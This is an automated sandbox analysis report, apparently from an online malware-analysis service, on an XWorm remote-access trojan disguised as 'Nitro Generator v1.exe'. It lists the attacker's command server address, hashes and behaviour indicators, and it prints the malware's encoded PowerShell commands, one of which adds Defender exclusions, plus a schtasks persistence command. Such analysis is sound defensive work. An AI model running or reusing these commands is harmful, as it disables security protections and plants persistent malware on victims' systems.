Analysis
-
max time kernel
146s -
max time network
151s -
platform
windows11-21h2_x64 -
resource
win11-20240508-en -
resource tags
arch:x64arch:x86image:win11-20240508-enlocale:en-usos:windows11-21h2-x64system -
submitted
21-06-2024 23:03
Static task
static1
Behavioral task
behavioral1
Sample
Nitro Generator v1.exe
Resource
win7-20240220-en
Behavioral task
behavioral2
Sample
Nitro Generator v1.exe
Resource
win10-20240404-en
Behavioral task
behavioral3
Sample
Nitro Generator v1.exe
Resource
win10v2004-20240508-en
Behavioral task
behavioral4
Sample
Nitro Generator v1.exe
Resource
win11-20240508-en
General
-
Target
Nitro Generator v1.exe
-
Size
225KB
-
MD5
a2da88430b3dd46d547cd75126ecee69
-
SHA1
c41229461c4b6ddc695c8a01940e76a0f0b930b7
-
SHA256
c95d4d86a71f2b53bf73a48d9b04f924f2527c7886b7db877b2d339ecda9ef12
-
SHA512
c3dcfa26d3c2a10f5ac58cd22f2c5bf5fbb986c11a43a547e0ea1f4ac016819de46bfadab6d111e83c2c9f572285a7f3ea4e275944ef7c16bf98426283fac859
-
SSDEEP
3072:LVAzYZD5kDzAgXKnj8meFDm8Zk5WFEw2zlXPcARAK4Mtx1Nnva/Vk5uAOcU3aQg7:LVBZ+DsfnwmlMkQEaARV4MT6dY9Mg59
Malware Config
Extracted
xworm
runderscore00-25851.portmap.host:25851
-
Install_directory
%ProgramData%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 2 IoCs
Processes:
resource yara_rule C:\Windows\Nitro Generator.exe family_xworm behavioral4/memory/244-46-0x0000000000530000-0x000000000054A000-memory.dmp family_xworm -
Drops startup file 2 IoCs
Processes:
Nitro Generator.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk Nitro Generator.exe -
Executes dropped EXE 4 IoCs
Processes:
NitroGen.exeNitro Generator.exesvchostsvchostpid process 880 NitroGen.exe 244 Nitro Generator.exe 648 svchost 3148 svchost -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
Nitro Generator.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3001105534-2705918504-2956618779-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\ProgramData\\svchost" Nitro Generator.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in Windows directory 1 IoCs
Processes:
Nitro Generator v1.exedescription ioc process File created C:\Windows\Nitro Generator.exe Nitro Generator v1.exe -
Processes:
powershell.exepowershell.exepid process 4852 powershell.exe 5044 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exeNitro Generator.exepid process 4852 powershell.exe 4852 powershell.exe 5044 powershell.exe 5044 powershell.exe 244 Nitro Generator.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
powershell.exepowershell.exeNitro Generator.exesvchostsvchostdescription pid process Token: SeDebugPrivilege 4852 powershell.exe Token: SeDebugPrivilege 5044 powershell.exe Token: SeDebugPrivilege 244 Nitro Generator.exe Token: SeDebugPrivilege 244 Nitro Generator.exe Token: SeDebugPrivilege 648 svchost Token: SeDebugPrivilege 3148 svchost -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
Nitro Generator.exepid process 244 Nitro Generator.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
Nitro Generator v1.exeNitro Generator.exedescription pid process target process PID 2716 wrote to memory of 4852 2716 Nitro Generator v1.exe powershell.exe PID 2716 wrote to memory of 4852 2716 Nitro Generator v1.exe powershell.exe PID 2716 wrote to memory of 5044 2716 Nitro Generator v1.exe powershell.exe PID 2716 wrote to memory of 5044 2716 Nitro Generator v1.exe powershell.exe PID 2716 wrote to memory of 880 2716 Nitro Generator v1.exe NitroGen.exe PID 2716 wrote to memory of 880 2716 Nitro Generator v1.exe NitroGen.exe PID 2716 wrote to memory of 244 2716 Nitro Generator v1.exe Nitro Generator.exe PID 2716 wrote to memory of 244 2716 Nitro Generator v1.exe Nitro Generator.exe PID 244 wrote to memory of 968 244 Nitro Generator.exe schtasks.exe PID 244 wrote to memory of 968 244 Nitro Generator.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"C:\Users\Admin\AppData\Local\Temp\Nitro Generator v1.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:2716 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAaQBuACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAGYAYQB6ACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcASQBuAHYAYQBsAGkAZAAgAE8AUwAgAFQAeQBwAGUAIAB4ADgANgAsACAAPwA/AD8APwA/ACcALAAnACcALAAnAE8ASwAnACwAJwBFAHIAcgBvAHIAJwApADwAIwBzAG0AdgAjAD4A"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4852
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHMAYwBnACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegBjACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAcAB1ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAYQBmACMAPgA="2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5044
-
-
C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"C:\Users\Admin\AppData\Local\Temp\NitroGen.exe"2⤵
- Executes dropped EXE
PID:880
-
-
C:\Windows\Nitro Generator.exe"C:\Windows\Nitro Generator.exe"2⤵
- Drops startup file
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:244 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svchost" /tr "C:\ProgramData\svchost"3⤵
- Scheduled Task/Job: Scheduled Task
PID:968
-
-
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:648
-
C:\ProgramData\svchostC:\ProgramData\svchost1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3148
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
654B
MD52cbbb74b7da1f720b48ed31085cbd5b8
SHA179caa9a3ea8abe1b9c4326c3633da64a5f724964
SHA256e31b18f21621d9983bfdf1ea3e53884a9d58b8ffd79e0e5790da6f3a81a8b9d3
SHA512ecf02d5240e0c1c005d3ab393aa7eff62bd498c2db5905157e2bf6d29e1b663228a9583950842629d1a4caef404c8941a0c7799b1a3bd1eb890a09fdb7efcff9
-
Filesize
1KB
MD50f0f33b5dc59d6998bdba6a65e602a1c
SHA180c26491daacdd38a1f174ea5a6be01532bc1da9
SHA256a5e18203246fdf1199469165357bd5329f0e8f4a77282045c01a43cba0a7e2ed
SHA51212027f852b46df30587773e35cd2e380a4876557b2b857dcbbbf3650e44c8c88e4c0ea085d125e5c19258d860e0a4bf27f48c7f0a9ec4181f03534df1d91ef4f
-
Filesize
139KB
MD516c70bc93e70148d8e32877fb69c5163
SHA19997631ad75d02297a4c7a06c37db115a0a1c0ec
SHA256b0c0ffb63ae352291b03770b081847a349f1c221a6f3a0cca1570050261f9f3d
SHA51202242bdaa7b78378d3f8fc85f6a9d51eb8672a348c718ac4483dcddcf061994d8dc7dc8ead58a0b6903d44d9dc06ff17e4782598f25ac5e4ffd8a528a05373dd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
77KB
MD58bbf53c41f2625a3c4e608ad13cb2c55
SHA13335287d42f6e674eb1d4465949e02d262bb8391
SHA256ae5a9dec7624bf30d8b8f9659dd6969973969a88933790fedff2f5717745e299
SHA5129c568dff7a8cbeb26997fdb17c7cc1c2a1fc3d060cf83fdbf1a5b994da8e04cf2e03a2f6a5406005d8edd77d3a497617f89c9cc2575b76c0ac0f0ceef97b60ec